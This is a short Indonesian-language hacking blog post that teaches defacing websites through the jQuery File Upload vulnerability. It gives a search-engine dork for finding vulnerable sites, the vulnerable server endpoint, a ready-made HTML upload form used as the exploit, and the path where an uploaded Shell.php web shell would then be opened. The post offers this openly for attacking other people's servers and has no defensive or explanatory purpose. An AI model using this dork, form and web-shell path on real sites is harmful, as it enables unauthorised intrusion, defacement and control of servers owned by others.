Langsung aja ane kasih tau cara deface dengan tehnik jQuery File Upload CSRF
Dork : inurl:/jquery-file-upload/
Exploit : http://localhost/dir/jquery-file-upload/server/php/
Exploit CSRF nya :
<form method="POST" action="http://localhost/dir/jquery-file-upload/server/php/"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
Contoh target vuln :
Udah tau kan cara make nya , kalo sukses Shell akses nya di: http://localhost/dir/jquery-file-upload/server/php/files/Shell.php
Greatz :


EmoticonEmoticon